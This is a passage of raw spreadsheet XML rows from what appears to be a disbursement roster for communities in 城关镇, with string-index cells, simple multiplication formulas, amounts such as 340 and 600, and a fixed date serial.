      <c r="C840" s="14" t="s">
        <v>2231</v>
      </c>
      <c r="D840" s="14" t="s">
        <v>2254</v>
      </c>
      <c r="E840" s="14" t="s">
        <v>1730</v>
      </c>
      <c r="F840" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G840" s="14">
        <v>1</v>
      </c>
      <c r="H840" s="14">
        <v>340</v>
      </c>
      <c r="I840" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J840" s="24">
        <v>45108</v>
      </c>
      <c r="K840" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="841" ht="23" customHeight="1" spans="1:11">
      <c r="A841" s="13" t="s">
        <v>2255</v>
      </c>
      <c r="B841" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C841" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D841" s="14" t="s">
        <v>2256</v>
      </c>
      <c r="E841" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F841" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G841" s="14">
        <v>1</v>
      </c>
      <c r="H841" s="14">
        <v>340</v>
      </c>
      <c r="I841" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J841" s="24">
        <v>45108</v>
      </c>
      <c r="K841" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="842" ht="23" customHeight="1" spans="1:11">
      <c r="A842" s="13" t="s">
        <v>2257</v>
      </c>
      <c r="B842" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C842" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D842" s="14" t="s">
        <v>2258</v>
      </c>
      <c r="E842" s="14" t="s">
        <v>2259</v>
      </c>
      <c r="F842" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G842" s="14">
        <v>1</v>
      </c>
      <c r="H842" s="14">
        <v>340</v>
      </c>
      <c r="I842" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J842" s="24">
        <v>45108</v>
      </c>
      <c r="K842" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="843" ht="23" customHeight="1" spans="1:11">
      <c r="A843" s="13" t="s">
        <v>2260</v>
      </c>
      <c r="B843" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C843" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D843" s="14" t="s">
        <v>2261</v>
      </c>
      <c r="E843" s="14" t="s">
        <v>2262</v>
      </c>
      <c r="F843" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G843" s="14">
        <v>1</v>
      </c>
      <c r="H843" s="14">
        <v>340</v>
      </c>
      <c r="I843" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J843" s="24">
        <v>45108</v>
      </c>
      <c r="K843" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="844" ht="23" customHeight="1" spans="1:11">
      <c r="A844" s="13" t="s">
        <v>2263</v>
      </c>
      <c r="B844" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C844" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D844" s="14" t="s">
        <v>2264</v>
      </c>
      <c r="E844" s="14" t="s">
        <v>2265</v>
      </c>
      <c r="F844" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G844" s="14">
        <v>1</v>
      </c>
      <c r="H844" s="14">
        <v>340</v>
      </c>
      <c r="I844" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J844" s="24">
        <v>45108</v>
      </c>
      <c r="K844" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="845" ht="23" customHeight="1" spans="1:11">
      <c r="A845" s="13" t="s">
        <v>2266</v>
      </c>
      <c r="B845" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C845" s="14" t="s">
        <v>2267</v>
      </c>
      <c r="D845" s="14" t="s">
        <v>2268</v>
      </c>
      <c r="E845" s="14" t="s">
        <v>499</v>
      </c>
      <c r="F845" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G845" s="14">
        <v>1</v>
      </c>
      <c r="H845" s="14">
        <v>340</v>
      </c>
      <c r="I845" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J845" s="24">
        <v>45108</v>
      </c>
      <c r="K845" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="846" ht="23" customHeight="1" spans="1:11">
      <c r="A846" s="13" t="s">
        <v>2269</v>
      </c>
      <c r="B846" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C846" s="14" t="s">
        <v>2212</v>
      </c>
      <c r="D846" s="14" t="s">
        <v>2270</v>
      </c>
      <c r="E846" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F846" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G846" s="14">
        <v>1</v>
      </c>
      <c r="H846" s="14">
        <v>340</v>
      </c>
      <c r="I846" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J846" s="24">
        <v>45108</v>
      </c>
      <c r="K846" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="847" ht="23" customHeight="1" spans="1:11">
      <c r="A847" s="13" t="s">
        <v>2271</v>
      </c>
      <c r="B847" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C847" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D847" s="14" t="s">
        <v>2272</v>
      </c>
      <c r="E847" s="14" t="s">
        <v>569</v>
      </c>
      <c r="F847" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G847" s="14">
        <v>1</v>
      </c>
      <c r="H847" s="14">
        <v>340</v>
      </c>
      <c r="I847" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J847" s="24">
        <v>45108</v>
      </c>
      <c r="K847" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="848" ht="23" customHeight="1" spans="1:11">
      <c r="A848" s="13" t="s">
        <v>2273</v>
      </c>
      <c r="B848" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C848" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D848" s="14" t="s">
        <v>2274</v>
      </c>
      <c r="E848" s="14" t="s">
        <v>1352</v>
      </c>
      <c r="F848" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G848" s="14">
        <v>1</v>
      </c>
      <c r="H848" s="14">
        <v>340</v>
      </c>
      <c r="I848" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J848" s="24">
        <v>45108</v>
      </c>
      <c r="K848" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="849" ht="23" customHeight="1" spans="1:11">
      <c r="A849" s="13" t="s">
        <v>2275</v>
      </c>
      <c r="B849" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C849" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D849" s="14" t="s">
        <v>2276</v>
      </c>
      <c r="E849" s="14" t="s">
        <v>2277</v>
      </c>
      <c r="F849" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G849" s="14">
        <v>1</v>
      </c>
      <c r="H849" s="14">
        <v>340</v>
      </c>
      <c r="I849" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J849" s="24">
        <v>45108</v>
      </c>
      <c r="K849" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="850" ht="23" customHeight="1" spans="1:11">
      <c r="A850" s="13" t="s">
        <v>2278</v>
      </c>
      <c r="B850" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C850" s="14" t="s">
        <v>2267</v>
      </c>
      <c r="D850" s="14" t="s">
        <v>2279</v>
      </c>
      <c r="E850" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F850" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G850" s="14">
        <v>1</v>
      </c>
      <c r="H850" s="14">
        <v>340</v>
      </c>
      <c r="I850" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J850" s="24">
        <v>45108</v>
      </c>
      <c r="K850" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="851" ht="23" customHeight="1" spans="1:11">
      <c r="A851" s="13" t="s">
        <v>2280</v>
      </c>
      <c r="B851" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C851" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D851" s="14" t="s">
        <v>2281</v>
      </c>
      <c r="E851" s="14" t="s">
        <v>2282</v>
      </c>
      <c r="F851" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G851" s="14">
        <v>1</v>
      </c>
      <c r="H851" s="14">
        <v>340</v>
      </c>
      <c r="I851" s="14">
        <f t="shared" si="39"/>
        <v>340</v>
      </c>
      <c r="J851" s="24">
        <v>45108</v>
      </c>
      <c r="K851" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="852" ht="23" customHeight="1" spans="1:11">
      <c r="A852" s="13" t="s">
        <v>2283</v>
      </c>
      <c r="B852" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C852" s="14" t="s">
        <v>2218</v>
      </c>
      <c r="D852" s="14" t="s">
        <v>2284</v>
      </c>
      <c r="E852" s="14" t="s">
        <v>2285</v>
      </c>
      <c r="F852" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G852" s="14">
        <v>2</v>
      </c>
      <c r="H852" s="14">
        <v>300</v>
      </c>
      <c r="I852" s="14">
        <f t="shared" si="39"/>
        <v>600</v>
      </c>
      <c r="J852" s="24">
        <v>45108</v>
      </c>
      <c r="K852" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="853" ht="23" customHeight="1" spans="1:11">
      <c r="A853" s="13" t="s">
        <v>2286</v>
      </c>
      <c r="B853" s="14" t="str">
        <f>B852</f>
        <v>城关镇</v>
      </c>
      <c r="C853" s="14" t="str">
        <f>C852</f>
        <v>西北社区工信局</v>
      </c>
      <c r="D853" s="18" t="s">
        <v>2287</v>
      </c>
      <c r="E853" s="18" t="s">
        <v>2288</v>
      </c>
      <c r="F853" s="14" t="str">
        <f>F852</f>
        <v>4113210106</v>
      </c>
      <c r="G853" s="14"/>
      <c r="H853" s="14"/>
      <c r="I853" s="14"/>
      <c r="J853" s="24"/>
      <c r="K853" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="854" ht="23" customHeight="1" spans="1:11">
      <c r="A854" s="13" t="s">
        <v>2289</v>
      </c>
      <c r="B854" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C854" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D854" s="14" t="s">
        <v>2290</v>
      </c>
      <c r="E854" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F854" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G854" s="14">
        <v>2</v>
      </c>
      <c r="H854" s="14">
        <v>300</v>
      </c>
      <c r="I854" s="14">
        <f>H854*G854</f>
        <v>600</v>
      </c>
      <c r="J854" s="24">
        <v>45108</v>
      </c>
      <c r="K854" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="855" ht="23" customHeight="1" spans="1:11">
      <c r="A855" s="13" t="s">
        <v>2291</v>
      </c>
      <c r="B855" s="14" t="str">
        <f>B854</f>
        <v>城关镇</v>
      </c>
      <c r="C855" s="14" t="str">
        <f>C854</f>
        <v>西北社区县社</v>
      </c>
      <c r="D855" s="19" t="s">
        <v>2292</v>
      </c>
      <c r="E855" s="19" t="s">
        <v>2293</v>
      </c>
      <c r="F855" s="14" t="str">
        <f>F854</f>
        <v>4113210106</v>
      </c>
      <c r="G855" s="14"/>
      <c r="H855" s="14"/>
      <c r="I855" s="14"/>
      <c r="J855" s="24"/>
      <c r="K855" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="856" ht="23" customHeight="1" spans="1:11">
      <c r="A856" s="13" t="s">
        <v>2294</v>
      </c>
      <c r="B856" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C856" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D856" s="14" t="s">
        <v>2295</v>
      </c>
      <c r="E856" s="14" t="s">
        <v>2296</v>
      </c>
      <c r="F856" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G856" s="14">
        <v>1</v>
      </c>
      <c r="H856" s="14">
        <v>340</v>
      </c>
      <c r="I856" s="14">
        <f t="shared" ref="I856:I862" si="40">H856*G856</f>
        <v>340</v>
      </c>
      <c r="J856" s="24">
        <v>45108</v>
      </c>
      <c r="K856" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="857" ht="23" customHeight="1" spans="1:11">
      <c r="A857" s="13" t="s">
        <v>2297</v>
      </c>
      <c r="B857" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C857" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D857" s="14" t="s">
        <v>2298</v>
      </c>
      <c r="E857" s="14" t="s">
        <v>2299</v>
      </c>
      <c r="F857" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G857" s="14">
        <v>1</v>
      </c>
      <c r="H857" s="14">
        <v>340</v>
      </c>
      <c r="I857" s="14">
        <f t="shared" si="40"/>
        <v>340</v>
      </c>
      <c r="J857" s="24">
        <v>45108</v>
      </c>
      <c r="K857" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="858" ht="23" customHeight="1" spans="1:11">
      <c r="A858" s="13" t="s">
        <v>2300</v>
      </c>
      <c r="B858" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C858" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D858" s="14" t="s">
        <v>2301</v>
      </c>
      <c r="E858" s="14" t="s">
        <v>2302</v>
      </c>
      <c r="F858" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G858" s="14">
        <v>1</v>
      </c>
      <c r="H858" s="14">
        <v>340</v>
      </c>
      <c r="I858" s="14">
        <f t="shared" si="40"/>
        <v>340</v>
      </c>
      <c r="J858" s="24">
        <v>45108</v>
      </c>
      <c r="K858" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="859" ht="23" customHeight="1" spans="1:11">
      <c r="A859" s="13" t="s">
        <v>2303</v>
      </c>
      <c r="B859" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C859" s="14" t="s">
        <v>2267</v>
      </c>
      <c r="D859" s="14" t="s">
        <v>2304</v>
      </c>
      <c r="E859" s="14" t="s">
        <v>2305</v>
      </c>
      <c r="F859" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G859" s="14">
        <v>1</v>
      </c>
      <c r="H859" s="14">
        <v>340</v>
      </c>
      <c r="I859" s="14">
        <f t="shared" si="40"/>
        <v>340</v>
      </c>
      <c r="J859" s="24">
        <v>45108</v>
      </c>
      <c r="K859" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="860" ht="23" customHeight="1" spans="1:11">
      <c r="A860" s="13" t="s">
        <v>2306</v>
      </c>
      <c r="B860" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C860" s="14" t="s">
        <v>2267</v>
      </c>
      <c r="D860" s="14" t="s">
        <v>2307</v>
      </c>
      <c r="E860" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F860" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G860" s="14">
        <v>1</v>
      </c>
      <c r="H860" s="14">
        <v>340</v>
      </c>
      <c r="I860" s="14">
        <f t="shared" si="40"/>
        <v>340</v>
      </c>
      <c r="J860" s="24">
        <v>45108</v>
      </c>
      <c r="K860" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="861" ht="23" customHeight="1" spans="1:11">
      <c r="A861" s="13" t="s">
        <v>2308</v>
      </c>
      <c r="B861" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C861" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D861" s="14" t="s">
        <v>2309</v>
      </c>
      <c r="E861" s="14" t="s">
        <v>2310</v>
      </c>
      <c r="F861" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G861" s="14">
        <v>1</v>
      </c>
      <c r="H861" s="14">
        <v>340</v>
      </c>
      <c r="I861" s="14">
        <f t="shared" si="40"/>
        <v>340</v>
      </c>
      <c r="J861" s="24">
        <v>45108</v>
      </c>
      <c r="K861" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="862" ht="23" customHeight="1" spans="1:11">
      <c r="A862" s="13" t="s">
        <v>2311</v>
      </c>
      <c r="B862" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C862" s="14" t="s">
        <v>2212</v>
      </c>
      <c r="D862" s="14" t="s">
        <v>2312</v>
      </c>
      <c r="E862" s="14" t="s">
        <v>1902</v>
      </c>
      <c r="F862" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G862" s="14">
        <v>3</v>
      </c>
      <c r="H862" s="14">
        <v>265</v>
      </c>
      <c r="I862" s="14">
        <f t="shared" si="40"/>
        <v>795</v>
      </c>
      <c r="J862" s="24">
        <v>45108</v>
      </c>
      <c r="K862" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="863" ht="23" customHeight="1" spans="1:11">
      <c r="A863" s="13" t="s">
        <v>2313</v>
      </c>
      <c r="B863" s="14" t="str">
        <f>B862</f>
        <v>城关镇</v>
      </c>
      <c r="C863" s="14" t="str">
        <f>C862</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D863" s="13" t="s">
        <v>2314</v>
      </c>
      <c r="E863" s="13" t="s">
        <v>2315</v>
      </c>
      <c r="F863" s="14" t="str">
        <f>F862</f>
        <v>4113210106</v>
      </c>
      <c r="G863" s="14"/>
      <c r="H863" s="14"/>
      <c r="I863" s="14"/>
      <c r="J863" s="24"/>
      <c r="K863" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="864" ht="23" customHeight="1" spans="1:11">
      <c r="A864" s="13" t="s">
        <v>2316</v>
      </c>
      <c r="B864" s="14" t="str">
        <f>B863</f>
        <v>城关镇</v>
      </c>
      <c r="C864" s="14" t="str">
        <f>C863</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D864" s="13" t="s">
        <v>2317</v>
      </c>
      <c r="E864" s="19" t="s">
        <v>2318</v>
      </c>
      <c r="F864" s="14" t="str">
        <f>F863</f>
        <v>4113210106</v>
      </c>
      <c r="G864" s="14"/>
      <c r="H864" s="14"/>
      <c r="I864" s="14"/>
      <c r="J864" s="24"/>
      <c r="K864" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="865" ht="23" customHeight="1" spans="1:11">
      <c r="A865" s="13" t="s">
        <v>2319</v>
      </c>
      <c r="B865" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C865" s="14" t="s">
        <v>2212</v>
      </c>
      <c r="D865" s="14" t="s">
        <v>2320</v>
      </c>
      <c r="E865" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F865" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G865" s="14">
        <v>2</v>
      </c>
      <c r="H865" s="14">
        <v>300</v>
      </c>
      <c r="I865" s="14">
        <f>H865*G865</f>
        <v>600</v>
      </c>
      <c r="J865" s="24">
        <v>45108</v>
      </c>
      <c r="K865" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="866" ht="23" customHeight="1" spans="1:11">
      <c r="A866" s="13" t="s">
        <v>2321</v>
      </c>
      <c r="B866" s="14" t="str">
        <f>B865</f>
        <v>城关镇</v>
      </c>
      <c r="C866" s="14" t="str">
        <f>C865</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D866" s="13" t="s">
        <v>2322</v>
      </c>
      <c r="E866" s="13" t="s">
        <v>2323</v>
      </c>
      <c r="F866" s="14" t="str">
        <f>F865</f>
        <v>4113210106</v>
      </c>
      <c r="G866" s="14"/>
      <c r="H866" s="14"/>
      <c r="I866" s="14"/>
      <c r="J866" s="24"/>
      <c r="K866" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="867" ht="23" customHeight="1" spans="1:11">
      <c r="A867" s="13" t="s">
        <v>2324</v>
      </c>
      <c r="B867" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C867" s="14" t="s">
        <v>2212</v>
      </c>
      <c r="D867" s="14" t="s">
        <v>2325</v>
      </c>
      <c r="E867" s="14" t="s">
        <v>933</v>
      </c>
      <c r="F867" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G867" s="14">
        <v>1</v>
      </c>
      <c r="H867" s="14">
        <v>340</v>
      </c>
      <c r="I867" s="14">
        <f>H867*G867</f>
        <v>340</v>
      </c>
      <c r="J867" s="24">
        <v>45108</v>
      </c>
      <c r="K867" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="868" ht="23" customHeight="1" spans="1:11">
      <c r="A868" s="13" t="s">
        <v>2326</v>
      </c>
      <c r="B868" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C868" s="14" t="s">
        <v>2212</v>
      </c>
      <c r="D868" s="14" t="s">
        <v>2327</v>
      </c>
      <c r="E868" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F868" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G868" s="14">
        <v>2</v>
      </c>
      <c r="H868" s="14">
        <v>300</v>
      </c>
      <c r="I868" s="14">
        <f>H868*G868</f>
        <v>600</v>
      </c>
      <c r="J868" s="24">
        <v>45108</v>
      </c>
      <c r="K868" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="869" ht="23" customHeight="1" spans="1:11">
      <c r="A869" s="13" t="s">
        <v>2328</v>
      </c>
      <c r="B869" s="14" t="str">
        <f>B868</f>
        <v>城关镇</v>
      </c>
      <c r="C869" s="14" t="str">
        <f>C868</f>
        <v>西北社区商业中心</v>
      </c>
      <c r="D869" s="13" t="s">
        <v>2329</v>
      </c>
      <c r="E869" s="13" t="s">
        <v>2330</v>
      </c>
      <c r="F869" s="14" t="str">
        <f>F868</f>
        <v>4113210106</v>
      </c>
      <c r="G869" s="14"/>
      <c r="H869" s="14"/>
      <c r="I869" s="14"/>
      <c r="J869" s="24"/>
      <c r="K869" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="870" ht="23" customHeight="1" spans="1:11">
      <c r="A870" s="13" t="s">
        <v>2331</v>
      </c>
      <c r="B870" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C870" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D870" s="14" t="s">
        <v>2332</v>
      </c>
      <c r="E870" s="14" t="s">
        <v>323</v>
      </c>
      <c r="F870" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G870" s="14">
        <v>1</v>
      </c>
      <c r="H870" s="14">
        <v>340</v>
      </c>
      <c r="I870" s="14">
        <f>H870*G870</f>
        <v>340</v>
      </c>
      <c r="J870" s="24">
        <v>45108</v>
      </c>
      <c r="K870" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="871" ht="23" customHeight="1" spans="1:11">
      <c r="A871" s="13" t="s">
        <v>2333</v>
      </c>
      <c r="B871" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C871" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D871" s="14" t="s">
        <v>2334</v>
      </c>
      <c r="E871" s="14" t="s">
        <v>2335</v>
      </c>
      <c r="F871" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G871" s="14">
        <v>2</v>
      </c>
      <c r="H871" s="14">
        <v>300</v>
      </c>
      <c r="I871" s="14">
        <f>H871*G871</f>
        <v>600</v>
      </c>
      <c r="J871" s="24">
        <v>45108</v>
      </c>
      <c r="K871" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="872" ht="23" customHeight="1" spans="1:11">
      <c r="A872" s="13" t="s">
        <v>2336</v>
      </c>
      <c r="B872" s="14" t="str">
        <f>B871</f>
        <v>城关镇</v>
      </c>
      <c r="C872" s="14" t="str">
        <f>C871</f>
        <v>西北社区县社</v>
      </c>
      <c r="D872" s="19" t="s">
        <v>2337</v>
      </c>
      <c r="E872" s="20" t="s">
        <v>2338</v>
      </c>
      <c r="F872" s="14" t="str">
        <f>F871</f>
        <v>4113210106</v>
      </c>
      <c r="G872" s="14"/>
      <c r="H872" s="14"/>
      <c r="I872" s="14"/>
      <c r="J872" s="24"/>
      <c r="K872" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="873" ht="23" customHeight="1" spans="1:11">
      <c r="A873" s="13" t="s">
        <v>2339</v>
      </c>
      <c r="B873" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C873" s="14" t="s">
        <v>2212</v>
      </c>
      <c r="D873" s="14" t="s">
        <v>2340</v>
      </c>
      <c r="E873" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F873" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G873" s="14">
        <v>1</v>
      </c>
      <c r="H873" s="14">
        <v>340</v>
      </c>
      <c r="I873" s="14">
        <f t="shared" ref="I873:I881" si="41">H873*G873</f>
        <v>340</v>
      </c>
      <c r="J873" s="24">
        <v>45108</v>
      </c>
      <c r="K873" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="874" ht="23" customHeight="1" spans="1:11">
      <c r="A874" s="13" t="s">
        <v>2341</v>
      </c>
      <c r="B874" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C874" s="14" t="s">
        <v>2342</v>
      </c>
      <c r="D874" s="14" t="s">
        <v>2343</v>
      </c>
      <c r="E874" s="14" t="s">
        <v>679</v>
      </c>
      <c r="F874" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G874" s="14">
        <v>1</v>
      </c>
      <c r="H874" s="14">
        <v>340</v>
      </c>
      <c r="I874" s="14">
        <f t="shared" si="41"/>
        <v>340</v>
      </c>
      <c r="J874" s="24">
        <v>45108</v>
      </c>
      <c r="K874" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="875" ht="23" customHeight="1" spans="1:11">
      <c r="A875" s="13" t="s">
        <v>2344</v>
      </c>
      <c r="B875" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C875" s="14" t="s">
        <v>2342</v>
      </c>
      <c r="D875" s="14" t="s">
        <v>2345</v>
      </c>
      <c r="E875" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F875" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G875" s="14">
        <v>1</v>
      </c>
      <c r="H875" s="14">
        <v>340</v>
      </c>
      <c r="I875" s="14">
        <f t="shared" si="41"/>
        <v>340</v>
      </c>
      <c r="J875" s="24">
        <v>45108</v>
      </c>
      <c r="K875" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="876" ht="23" customHeight="1" spans="1:11">
      <c r="A876" s="13" t="s">
        <v>2346</v>
      </c>
      <c r="B876" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C876" s="14" t="s">
        <v>2342</v>
      </c>
      <c r="D876" s="14" t="s">
        <v>2347</v>
      </c>
      <c r="E876" s="14" t="s">
        <v>258</v>
      </c>
      <c r="F876" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G876" s="14">
        <v>1</v>
      </c>
      <c r="H876" s="14">
        <v>340</v>
      </c>
      <c r="I876" s="14">
        <f t="shared" si="41"/>
        <v>340</v>
      </c>
      <c r="J876" s="24">
        <v>45108</v>
      </c>
      <c r="K876" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="877" ht="23" customHeight="1" spans="1:11">
      <c r="A877" s="13" t="s">
        <v>2348</v>
      </c>
      <c r="B877" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C877" s="14" t="s">
        <v>2212</v>
      </c>
      <c r="D877" s="14" t="s">
        <v>2349</v>
      </c>
      <c r="E877" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F877" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G877" s="14">
        <v>1</v>
      </c>
      <c r="H877" s="14">
        <v>340</v>
      </c>
      <c r="I877" s="14">
        <f t="shared" si="41"/>
        <v>340</v>
      </c>
      <c r="J877" s="24">
        <v>45108</v>
      </c>
      <c r="K877" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="878" ht="23" customHeight="1" spans="1:11">
      <c r="A878" s="13" t="s">
        <v>2350</v>
      </c>
      <c r="B878" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C878" s="14" t="s">
        <v>2342</v>
      </c>
      <c r="D878" s="14" t="s">
        <v>2351</v>
      </c>
      <c r="E878" s="14" t="s">
        <v>435</v>
      </c>
      <c r="F878" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G878" s="14">
        <v>1</v>
      </c>
      <c r="H878" s="14">
        <v>340</v>
      </c>
      <c r="I878" s="14">
        <f t="shared" si="41"/>
        <v>340</v>
      </c>
      <c r="J878" s="24">
        <v>45108</v>
      </c>
      <c r="K878" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="879" ht="23" customHeight="1" spans="1:11">
      <c r="A879" s="13" t="s">
        <v>2352</v>
      </c>
      <c r="B879" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C879" s="14" t="s">
        <v>2249</v>
      </c>
      <c r="D879" s="14" t="s">
        <v>2353</v>
      </c>
      <c r="E879" s="14" t="s">
        <v>621</v>
      </c>
      <c r="F879" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G879" s="14">
        <v>1</v>
      </c>
      <c r="H879" s="14">
        <v>340</v>
      </c>
      <c r="I879" s="14">
        <f t="shared" si="41"/>
        <v>340</v>
      </c>
      <c r="J879" s="24">
        <v>45108</v>
      </c>
      <c r="K879" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="880" ht="23" customHeight="1" spans="1:11">
      <c r="A880" s="13" t="s">
        <v>2354</v>
      </c>
      <c r="B880" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C880" s="14" t="s">
        <v>2355</v>
      </c>
      <c r="D880" s="14" t="s">
        <v>2356</v>
      </c>
